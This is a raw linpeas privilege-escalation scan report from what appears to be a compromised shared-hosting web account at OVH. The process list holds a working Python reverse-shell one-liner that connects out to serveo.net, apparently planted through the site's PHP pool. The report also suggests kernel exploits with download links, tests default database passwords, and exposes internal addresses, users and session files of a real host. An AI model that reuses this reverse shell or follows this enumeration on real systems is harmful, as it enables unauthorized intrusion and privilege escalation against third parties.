β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„
                    β–„β–„β–„β–„β–„β–„β–„             β–„β–„β–„β–„β–„β–„β–„β–„
             β–„β–„β–„β–„β–„β–„β–„      β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„  β–„β–„β–„β–„
         β–„β–„β–„β–„     β–„ β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„ β–„β–„β–„β–„β–„β–„
         β–„    β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„
         β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„ β–„β–„β–„β–„β–„       β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„
         β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„          β–„β–„β–„β–„β–„β–„               β–„β–„β–„β–„β–„β–„ β–„
         β–„β–„β–„β–„β–„β–„              β–„β–„β–„β–„β–„β–„β–„β–„                 β–„β–„β–„β–„ 
         β–„β–„                  β–„β–„β–„ β–„β–„β–„β–„β–„                  β–„β–„β–„
         β–„β–„                β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„                  β–„β–„
         β–„            β–„β–„ β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„   β–„β–„
         β–„      β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„
         β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„                                β–„β–„β–„β–„
         β–„β–„β–„β–„β–„  β–„β–„β–„β–„β–„                       β–„β–„β–„β–„β–„β–„     β–„β–„β–„β–„
         β–„β–„β–„β–„   β–„β–„β–„β–„β–„                       β–„β–„β–„β–„β–„      β–„ β–„β–„
         β–„β–„β–„β–„β–„  β–„β–„β–„β–„β–„        β–„β–„β–„β–„β–„β–„β–„        β–„β–„β–„β–„β–„     β–„β–„β–„β–„β–„
         β–„β–„β–„β–„β–„β–„  β–„β–„β–„β–„β–„β–„β–„      β–„β–„β–„β–„β–„β–„β–„      β–„β–„β–„β–„β–„β–„β–„   β–„β–„β–„β–„β–„ 
          β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„        β–„          β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„ 
         β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„                       β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„
         β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„                         β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„
         β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„            β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„
          β–€β–€β–„β–„β–„   β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„ β–„β–„β–„β–„β–„β–„β–„β–€β–€β–€β–€β–€β–€
               β–€β–€β–€β–„β–„β–„β–„β–„      β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„  β–„β–„β–„β–„β–„β–„β–€β–€
                     β–€β–€β–€β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–„β–€β–€β–€

    /---------------------------------------------------------------------------------\
    |                             Do you like PEASS?                                  |
    |---------------------------------------------------------------------------------| 
    |         Get the latest version    :     https://github.com/sponsors/carlospolop |
    |         Follow on Twitter         :     @hacktricks_live                          |
    |         Respect on HTB            :     SirBroccoli                             |
    |---------------------------------------------------------------------------------|
    |                                 Thank you!                                      |
    \---------------------------------------------------------------------------------/
          linpeas-ng by carlospolop

ADVISORY: This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own computers and/or with the computer owner's permission.

Linux Privesc Checklist: https://book.hacktricks.xyz/linux-hardening/linux-privilege-escalation-checklist
 LEGEND:
  RED/YELLOW: 95% a PE vector
  RED: You should take a look to it
  LightCyan: Users with console
  Blue: Users without console & mounted devs
  Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs) 
  LightMagenta: Your username

 Starting linpeas. Caching Writable Folders...

                               ╔═══════════════════╗
═══════════════════════════════╣ Basic information ╠═══════════════════════════════
                               β•šβ•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•
OS: Linux version 5.15.41-ovh-vps-grsec-zfs-classid (ktanguy@ktanguy-build-buster.sdev.ha.ovh.net) (gcc (Debian 8.3.0-6) 8.3.0, GNU ld (GNU Binutils for Debian) 2.31.1) #1 SMP Thu May 19 07:42:04 UTC 2022
User & Groups: uid=243112(mycochar) gid=100(users) groups=100(users)
Hostname: webm202.cluster010.gra.hosting.ovh.net
Writable folder: 
Remember that you can use the '-t' option to call the Internet connectivity checks and automatic network recon!
[+] /bin/ping is available for network discovery (linpeas can discover hosts, learn more with -h)
[+] /bin/bash is available for network discovery, port scanning and port forwarding (linpeas can discover hosts, scan ports, and forward ports. Learn more with -h)
[+] /bin/nc is available for network discovery & port scanning (linpeas can discover hosts and scan ports, learn more with -h)



Caching directories . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . DONE

                              ╔════════════════════╗
══════════════════════════════╣ System Information ╠══════════════════════════════
                              β•šβ•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•
╔══════════╣ Operative system
β•š https://book.hacktricks.xyz/linux-hardening/privilege-escalation#kernel-exploits
Linux version 5.15.41-ovh-vps-grsec-zfs-classid (ktanguy@ktanguy-build-buster.sdev.ha.ovh.net) (gcc (Debian 8.3.0-6) 8.3.0, GNU ld (GNU Binutils for Debian) 2.31.1) #1 SMP Thu May 19 07:42:04 UTC 2022
Distributor ID:	Debian
Description:	Debian GNU/Linux 8.11 (jessie)
Release:	8.11
Codename:	jessie

╔══════════╣ Sudo version
sudo Not Found


╔══════════╣ PATH
β•š https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-path-abuses
/usr/local/bin:/usr/local/sbin:/usr/bin:/usr/sbin:/bin:/sbin:.

╔══════════╣ Date & uptime
Wed Nov 15 20:42:29 UTC 2023
 20:42:29 up 397 days, 10:16,  0 users,  load average: 5.13, 4.49, 4.16

╔══════════╣ System stats
df and lsblk Not Found
             total       used       free     shared    buffers     cached
Mem:      32822796   30725608    2097188   16551868      20928   20153304
-/+ buffers/cache:   10551376   22271420
Swap:       524284     524284          0

╔══════════╣ CPU info
lscpu Not Found

╔══════════╣ Any sd*/disk* disk in /dev? (limit 20)

╔══════════╣ Unmounted file-system?
β•š Check if you can mount umounted devices

╔══════════╣ Environment
β•š Any private information inside environment variables?
HISTSIZE=0
HISTFILESIZE=0
USER=mycochar
PWD=/home/mycochar/www/image/photo
SHLVL=2
HISTFILE=/dev/null
_=/usr/bin/env

╔══════════╣ Searching Signature verification failed in dmesg
β•š https://book.hacktricks.xyz/linux-hardening/privilege-escalation#dmesg-signature-verification-failed
dmesg Not Found

╔══════════╣ Executing Linux Exploit Suggester
β•š https://github.com/mzet-/linux-exploit-suggester
gzip: /proc/config.gz: Permission denied
gzip: /proc/config.gz: Permission denied
[+] [CVE-2022-0847] DirtyPipe

   Details: https://dirtypipe.cm4all.com/
   Exposure: less probable
   Tags: ubuntu=(20.04|21.04),debian=11
   Download URL: https://haxx.in/files/dirtypipez.c

[+] [CVE-2021-22555] Netfilter heap out-of-bounds write

   Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
   Exposure: less probable
   Tags: ubuntu=20.04{kernel:5.8.0-*}
   Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
   Comments: ip_tables kernel module must be loaded


╔══════════╣ Executing Linux Exploit Suggester 2
β•š https://github.com/jondonas/linux-exploit-suggester-2

╔══════════╣ Protections
═╣ AppArmor enabled? .............. AppArmor Not Found
═╣ AppArmor profile? .............. unconfined
═╣ is linuxONE? ................... s390x Not Found
═╣ grsecurity present? ............ Yes
═╣ PaX bins present? .............. PaX Not Found
═╣ Execshield enabled? ............ Execshield Not Found
═╣ SELinux enabled? ............... sestatus Not Found
═╣ Seccomp enabled? ............... disabled
═╣ User namespace? ................ enabled
═╣ Cgroup2 enabled? ............... enabled
═╣ Is ASLR enabled? ............... Yes
═╣ Printer? ....................... No
═╣ Is this a virtual machine? ..... No

                                   ╔═══════════╗
═══════════════════════════════════╣ Container ╠═══════════════════════════════════
                                   β•šβ•β•β•β•β•β•β•β•β•β•β•β•
╔══════════╣ Container related tools present (if any):
╔══════════╣ Am I Containered?
╔══════════╣ Container details
═╣ Is this a container? ........... No
═╣ Any running containers? ........ No


                                     ╔═══════╗
═════════════════════════════════════╣ Cloud ╠═════════════════════════════════════
                                     β•šβ•β•β•β•β•β•β•β•
═╣ Google Cloud Platform? ............... No
═╣ AWS ECS? ............................. No
═╣ AWS EC2? ............................. No
═╣ AWS EC2 Beanstalk? ................... No
═╣ AWS Lambda? .......................... No
═╣ AWS Codebuild? ....................... No
═╣ DO Droplet? .......................... No
═╣ IBM Cloud VM? ........................ No
═╣ Azure VM? ............................ No
═╣ Azure APP? ........................... No



                ╔════════════════════════════════════════════════╗
════════════════╣ Processes, Crons, Timers, Services and Sockets ╠════════════════
                β•šβ•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•
╔══════════╣ Cleaned processes
β•š Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes
mycochar 26347  0.0  0.0 1139916 18816 ?       S    20:42   0:00 php-fpm: pool mycochar (php5.4)
mycochar 26352  0.0  0.0   3496  2540 ?        S    20:42   0:00  _ sh -c sh linpeas.sh -a > report.txt 2>&1
mycochar 26353  2.4  0.0   5732  4664 ?        S    20:42   0:00      _ sh linpeas.sh -a
mycochar 28621  0.0  0.0   5732  3488 ?        S    20:42   0:00          _ sh linpeas.sh -a
mycochar 28624  0.0  0.0   2956  1692 ?        R    20:42   0:00          |   _ ps fauxwww
mycochar 28625  0.0  0.0   5732  2284 ?        S    20:42   0:00          _ sh linpeas.sh -a
mycochar  9404  0.0  0.0   3504  2528 ?        S    20:17   0:00 sh -c python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("serveo.net",9877));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")' 2>&1
mycochar  9405  0.0  0.0  10744  7020 ?        S    20:17   0:00  _ python -c import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("serveo.net",9877));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")
mycochar  9406  0.0  0.0   3608  2860 pts/1    Ss+  20:17   0:00      _ sh

╔══════════╣ Binary processes permissions (non 'root root' and not belonging to current user)
β•š https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes

╔══════════╣ Processes whose PPID belongs to a different user (not root)
β•š You will know if a user can somehow spawn processes as a different user

╔══════════╣ Files opened by processes belonging to other users
β•š This is usually empty because of the lack of privileges to read other user processes information
COMMAND   PID     USER   FD   TYPE DEVICE     SIZE       NODE NAME

╔══════════╣ Processes with credentials in memory (root req)
β•š https://book.hacktricks.xyz/linux-hardening/privilege-escalation#credentials-from-process-memory
gdm-password Not Found
gnome-keyring-daemon Not Found
lightdm Not Found
vsftpd Not Found
apache2 Not Found
sshd Not Found

╔══════════╣ Different processes executed during 1 min (interesting is low number of repetitions)
β•š https://book.hacktricks.xyz/linux-hardening/privilege-escalation#frequent-cron-jobs

╔══════════╣ Cron jobs
β•š https://book.hacktricks.xyz/linux-hardening/privilege-escalation#scheduled-cron-jobs
/usr/sbin/crontab
Crontab is not enabled here...
Adding a cron task to your website is explained in the following documentation:

    https://www.ovh.co.uk/g1990.hosting-automated-tasks-cron

---

Il n'est pas possible d'utiliser Crontab ici...
L'ajout d'une tΓ’che cron pour votre site est expliquΓ© dans la documentation suivante :

    https://docs.ovh.com/fr/fr/web/hosting/mutualise-taches-automatisees-cron/#taches-automatisees-avec-variables
incrontab Not Found
Crontab is not enabled here...
Adding a cron task to your website is explained in the following documentation:

    https://www.ovh.co.uk/g1990.hosting-automated-tasks-cron

---

Il n'est pas possible d'utiliser Crontab ici...
L'ajout d'une tΓ’che cron pour votre site est expliquΓ© dans la documentation suivante :

    https://docs.ovh.com/fr/fr/web/hosting/mutualise-taches-automatisees-cron/#taches-automatisees-avec-variables

╔══════════╣ Services
β•š Search for outdated versions

╔══════════╣ Systemd PATH
β•š https://book.hacktricks.xyz/linux-hardening/privilege-escalation#systemd-path-relative-paths

╔══════════╣ Analyzing .service files
β•š https://book.hacktricks.xyz/linux-hardening/privilege-escalation#services
You can't write on systemd PATH

╔══════════╣ System timers
β•š https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers

╔══════════╣ Analyzing .timer files
β•š https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers

╔══════════╣ Analyzing .socket files
β•š https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets

╔══════════╣ Unix Sockets Listening
β•š https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets
sed: -e expression #1, char 0: no previous regular expression
  └─( - Can Connect)

╔══════════╣ D-Bus config files
β•š https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus

╔══════════╣ D-Bus Service Objects list
β•š https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus
busctl Not Found


                              ╔═════════════════════╗
══════════════════════════════╣ Network Information ╠══════════════════════════════
                              β•šβ•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•
╔══════════╣ Hostname, hosts and DNS
webm202.cluster010.gra.hosting.ovh.net
127.0.0.1   localhost.localdomain localhost
10.10.20.202 webm202.cluster010.gra.hosting.ovh.net webm202


213.186.33.19 fake.ha.ovh.net ocotest
213.186.33.19 okiller.cluster010.hosting.ovh.net
213.186.33.19 fpm5.3-check.cluster010.hosting.ovh.net
213.186.33.19 fpm5.4-check.cluster010.hosting.ovh.net
213.186.33.19 fpm5.5-check.cluster010.hosting.ovh.net
213.186.33.19 fpm5.6-check.cluster010.hosting.ovh.net
213.186.33.19 fpm7.0-check.cluster010.hosting.ovh.net
213.186.33.19 fpm7.1-check.cluster010.hosting.ovh.net
213.186.33.19 fpm7.2-check.cluster010.hosting.ovh.net
213.186.33.19 fpm7.3-check.cluster010.hosting.ovh.net
213.186.33.19 fpm7.4-check.cluster010.hosting.ovh.net
213.186.33.19 fpm8.0-check.cluster010.hosting.ovh.net
213.186.33.19 fpm8.1-check.cluster010.hosting.ovh.net
213.186.33.19 fpm8.2-check.cluster010.hosting.ovh.net
213.186.33.19 ocotest2.cluster010.hosting.ovh.net

::1     ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
ff02::3 ip6-allhosts
nameserver 127.0.0.1
nameserver 10.10.8.1
nameserver 10.10.8.2
nameserver 10.10.8.3
search cluster010.gra.hosting.ovh.net gra.hosting.ovh.net ovh.net
cluster010.gra.hosting.ovh.net

╔══════════╣ Content of /etc/inetd.conf & /etc/xinetd.conf
/etc/inetd.conf Not Found

╔══════════╣ Interfaces
default		0.0.0.0
loopback	127.0.0.0
link-local	169.254.0.0

eth0      Link encap:Ethernet  HWaddr 00:25:90:7b:00:64  
          inet addr:51.83.11.123  Bcast:51.83.11.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)
          Memory:fb920000-fb93ffff 

eth1      Link encap:Ethernet  HWaddr 00:25:90:7b:00:65  
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)
          Memory:fb900000-fb91ffff 

eth1.10   Link encap:Ethernet  HWaddr 00:25:90:7b:00:65  
          inet addr:10.10.20.202  Bcast:10.10.255.255  Mask:255.255.0.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

lo:CZ     Link encap:Local Loopback  
          inet addr:94.23.175.19  Mask:255.255.255.255
          UP LOOPBACK RUNNING  MTU:65536  Metric:1

lo:DE     Link encap:Local Loopback  
          inet addr:87.98.247.19  Mask:255.255.255.255
          UP LOOPBACK RUNNING  MTU:65536  Metric:1

lo:ES     Link encap:Local Loopback  
          inet addr:87.98.231.19  Mask:255.255.255.255
          UP LOOPBACK RUNNING  MTU:65536  Metric:1

lo:FI     Link encap:Local Loopback  
          inet addr:188.165.143.19  Mask:255.255.255.255
          UP LOOPBACK RUNNING  MTU:65536  Metric:1

lo:FR     Link encap:Local Loopback  
          inet addr:213.186.33.19  Mask:255.255.255.255
          UP LOOPBACK RUNNING  MTU:65536  Metric:1

lo:IE     Link encap:Local Loopback  
          inet addr:188.165.7.19  Mask:255.255.255.255
          UP LOOPBACK RUNNING  MTU:65536  Metric:1

lo:IT     Link encap:Local Loopback  
          inet addr:94.23.64.19  Mask:255.255.255.255
          UP LOOPBACK RUNNING  MTU:65536  Metric:1

lo:LT     Link encap:Local Loopback  
          inet addr:188.165.31.19  Mask:255.255.255.255
          UP LOOPBACK RUNNING  MTU:65536  Metric:1

lo:NL     Link encap:Local Loopback  
          inet addr:94.23.151.19  Mask:255.255.255.255
          UP LOOPBACK RUNNING  MTU:65536  Metric:1

lo:PL     Link encap:Local Loopback  
          inet addr:87.98.239.19  Mask:255.255.255.255
          UP LOOPBACK RUNNING  MTU:65536  Metric:1

lo:PT     Link encap:Local Loopback  
          inet addr:94.23.79.19  Mask:255.255.255.255
          UP LOOPBACK RUNNING  MTU:65536  Metric:1

lo:UK     Link encap:Local Loopback  
          inet addr:87.98.255.19  Mask:255.255.255.255
          UP LOOPBACK RUNNING  MTU:65536  Metric:1

lo:XX     Link encap:Local Loopback  
          inet addr:87.98.175.141  Mask:255.255.255.255
          UP LOOPBACK RUNNING  MTU:65536  Metric:1


╔══════════╣ Networks and neighbours
INET (IPv4) not configured in this system.

╔══════════╣ Iptables rules
iptables rules Not Found

╔══════════╣ Active Ports
β•š https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports
tcp    LISTEN     0      100            127.0.0.1:10026                 *:*     
tcp    LISTEN     0      4096        10.10.20.202:7946                  *:*     
tcp    LISTEN     0      4096           127.0.0.1:7373                  *:*     
tcp    LISTEN     0      20                     *:79                    *:*     
tcp    LISTEN     0      128                    *:111                   *:*     
tcp    LISTEN     0      511                    *:80                    *:*     
tcp    LISTEN     0      511                    *:8082                  *:*     
tcp    LISTEN     0      10          10.10.20.202:53                    *:*     
tcp    LISTEN     0      10             127.0.0.1:53                    *:*     
tcp    LISTEN     0      128         10.10.20.202:51413                 *:*     
tcp    LISTEN     0      128                    *:22                    *:*     
tcp    LISTEN     0      128            127.0.0.1:953                   *:*     
tcp    LISTEN     0      511                    *:443                   *:*     
tcp    LISTEN     0      128         10.10.20.202:9091                  *:*     

╔══════════╣ Can I sniff with tcpdump?
No



                               ╔═══════════════════╗
═══════════════════════════════╣ Users Information ╠═══════════════════════════════
                               β•šβ•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•
╔══════════╣ My user
β•š https://book.hacktricks.xyz/linux-hardening/privilege-escalation#users
uid=243112(mycochar) gid=100(users) groups=100(users)

╔══════════╣ Do I have PGP keys?
/usr/bin/gpg
netpgpkeys Not Found
netpgp Not Found

╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d
β•š https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid

╔══════════╣ Checking sudo tokens
β•š https://book.hacktricks.xyz/linux-hardening/privilege-escalation#reusing-sudo-tokens
ptrace protection is enabled ()

╔══════════╣ Checking Pkexec policy
β•š https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe#pe-method-2

╔══════════╣ Superusers
root:x:0:0:root:/root:/bin/bash

╔══════════╣ Users with console
ovh:x:500:100:ovh:/home/ovh:/bin/bash
ovhcron:x:158:151:ovhcron:/home.admin/ovhcron:/bin/bash
root:x:0:0:root:/root:/bin/bash

╔══════════╣ All users & groups
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon[0m) gid=1(daemon[0m) groups=1(daemon[0m)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=100(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=101(systemd-timesync) gid=102(systemd-journal) groups=102(systemd-journal)
uid=102(systemd-network) gid=103(systemd-timesync) groups=103(systemd-timesync)
uid=103(systemd-resolve) gid=104(systemd-network) groups=104(systemd-network)
uid=104(messagebus) gid=105(systemd-resolve) groups=105(systemd-resolve)
uid=105(unscd) gid=109(Debian-exim) groups=109(Debian-exim)
uid=106(ntp) gid=112(ssl-cert) groups=112(ssl-cert)
uid=107(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=108(oco) gid=114 groups=114
uid=109(puppet) gid=115 groups=115
uid=110(bind) gid=116 groups=116
uid=111(_rpc) gid=65534(nogroup) groups=65534(nogroup)
uid=112(statd) gid=65534(nogroup) groups=65534(nogroup)
uid=113(redis) gid=119 groups=119
uid=114(_serf) gid=120 groups=120
uid=115(debian-transmission) gid=121 groups=121
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=158(ovhcron) gid=151(ovhadmin) groups=151(ovhadmin)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=243112(mycochar) gid=100(users) groups=100(users)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=400(postfix) gid=400(postfix) groups=400(postfix)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=490(adminrobot) gid=490 groups=490
uid=495(autohosting) gid=495 groups=495
uid=498(_ossec) gid=117(ovhossec) groups=117(ovhossec)
uid=499(telegraf) gid=499 groups=499
uid=5(games) gid=60(games) groups=60(games)
uid=500(ovh) gid=100(users) groups=100(users)
uid=6(man) gid=12(man) groups=12(man)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=99(ovhnobody) gid=99(ovhnogroup) groups=99(ovhnogroup)

╔══════════╣ Login now
 20:43:38 up 397 days, 10:17,  0 users,  load average: 4.60, 4.50, 4.19
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT

╔══════════╣ Last logons

╔══════════╣ Last time logon each user

╔══════════╣ Password policy
PASS_MAX_DAYS	99999
PASS_MIN_DAYS	0
PASS_WARN_AGE	7
ENCRYPT_METHOD SHA512

╔══════════╣ Do not forget to test 'su' as any other user with shell: without password and with their names as password (I can't do it...)

╔══════════╣ Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!



                             ╔══════════════════════╗
═════════════════════════════╣ Software Information ╠═════════════════════════════
                             β•šβ•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•
╔══════════╣ Useful software
/usr/bin/base64
/usr/bin/curl
/usr/bin/make
/bin/nc
/bin/nc.traditional
/bin/netcat
/usr/local/bin/perl
/usr/local/bin/php
/bin/ping
/usr/bin/python
/usr/bin/python2
/usr/bin/python2.7
/usr/bin/python3
/usr/local/bin/ruby
/usr/bin/wget

╔══════════╣ Installed Compilers
ii  ruby-sass                          3.4.6-2                                 all          powerful but elegant CSS compiler that makes CSS fun again

╔══════════╣ MySQL version
mysql  Ver 14.14 Distrib 5.5.62, for debian-linux-gnu (i686) using readline 6.3


═╣ MySQL connection using default root/root ........... No
═╣ MySQL connection using root/toor ................... No
═╣ MySQL connection using root/NOPASS ................. No


═╣ PostgreSQL connection to template0 using postgres/NOPASS ........ No
═╣ PostgreSQL connection to template1 using postgres/NOPASS ........ No
═╣ PostgreSQL connection to template0 using pgsql/NOPASS ........... No
═╣ PostgreSQL connection to template1 using pgsql/NOPASS ........... No

╔══════════╣ Analyzing PHP Sessions Files (limit 70)
/var/lib/php/sessions Not Found
-rw------- 1 mycochar users 0 Nov 15 19:19 /tmp/sess_01d28c2a3a52cd7a037f9f7a99d466a8
-rw------- 1 mycochar users 0 Nov 15 19:09 /tmp/sess_0fc880d1c697df4968af7b4e832b0729
-rw------- 1 mycochar users 0 Nov 15 19:07 /tmp/sess_1b7d5173984bc4410113c58a5cff83a9
-rw------- 1 mycochar users 0 Nov 15 19:04 /tmp/sess_1c4b70d3388df6cdb38fdbeeb960ff9c
-rw------- 1 mycochar users 0 Nov 15 19:04 /tmp/sess_227f383b740484c6488e15df433785ae
-rw------- 1 mycochar users 0 Nov 15 20:19 /tmp/sess_24b5a01dc832778a06ca362150f798e2
-rw------- 1 mycochar users 0 Nov 15 19:55 /tmp/sess_29603613e4507f8d635e8ce1d00583a9
-rw------- 1 mycochar users 0 Nov 15 19:47 /tmp/sess_2cb0d51995895f00bd652a81417b54e1
-rw------- 1 mycochar users 0 Nov 15 19:51 /tmp/sess_2dc13514193365a6120f5aa38a97a597
-rw------- 1 mycochar users 0 Nov 15 20:32 /tmp/sess_31f1b2501534bbc4f89be45a04f8ab51
-rw------- 1 mycochar users 0 Nov 15 20:25 /tmp/sess_34e949e5b4a9bf5a18089164d102e0a3
-rw------- 1 mycochar users 0 Nov 15 19:11 /tmp/sess_3641eeaf4c0c0c011dbb9558ec238a81
-rw------- 1 mycochar users 0 Nov 15 20:15 /tmp/sess_38987a9624a61f75827f5e4e490ed449
-rw------- 1 mycochar users 0 Nov 15 19:09 /tmp/sess_3bf144273538b5b45ec8be93621f23ef
-rw------- 1 mycochar users 0 Nov 15 19:46 /tmp/sess_4017f58b150c2d81a9b57230f8784391
-rw------- 1 mycochar users 0 Nov 15 19:21 /tmp/sess_43233c6b4111ca3b24f4706f35dcf9ad
-rw------- 1 mycochar users 0 Nov 15 20:06 /tmp/sess_45186abe9c664700116044b6edf8ad50
-rw------- 1 mycochar users 0 Nov 15 20:19 /tmp/sess_5948e49ff46b4341a676ec8346691b82
-rw------- 1 mycochar users 0 Nov 15 19:33 /tmp/sess_648fde2190072c5b0e4e5e467cd937ae
-rw------- 1 mycochar users 0 Nov 15 20:23 /tmp/sess_6946f3d8377c399f1095f1581e8ec6b2
-rw------- 1 mycochar users 0 Nov 15 20:29 /tmp/sess_6b46972afd8a5aa65e88970504d909cb
-rw------- 1 mycochar users 0 Nov 15 19:07 /tmp/sess_6fc461c011baafc421bf76392728fb40
-rw------- 1 mycochar users 0 Nov 15 20:09 /tmp/sess_735ce800d3dd7d725cf2f6b0291c8e20
-rw------- 1 mycochar users 0 Nov 15 20:14 /tmp/sess_8368dd5fa0b7fa44e124b584834c974c
-rw------- 1 mycochar users 0 Nov 15 19:28 /tmp/sess_8382a99bd1b50ca3283e772c25a4c0d2
-rw------- 1 mycochar users 0 Nov 15 19:18 /tmp/sess_84408de5120e9ed6b8c860994c9053b8
-rw------- 1 mycochar users 0 Nov 15 20:32 /tmp/sess_85ea8f34de8f0e634a35f2363c161f19
-rw------- 1 mycochar users 0 Nov 15 20:33 /tmp/sess_86624df08b80228bf72b330d91cf3015
-rw------- 1 mycochar users 0 Nov 15 19:25 /tmp/sess_8ffe0701697a41b0de306da072f19fa7
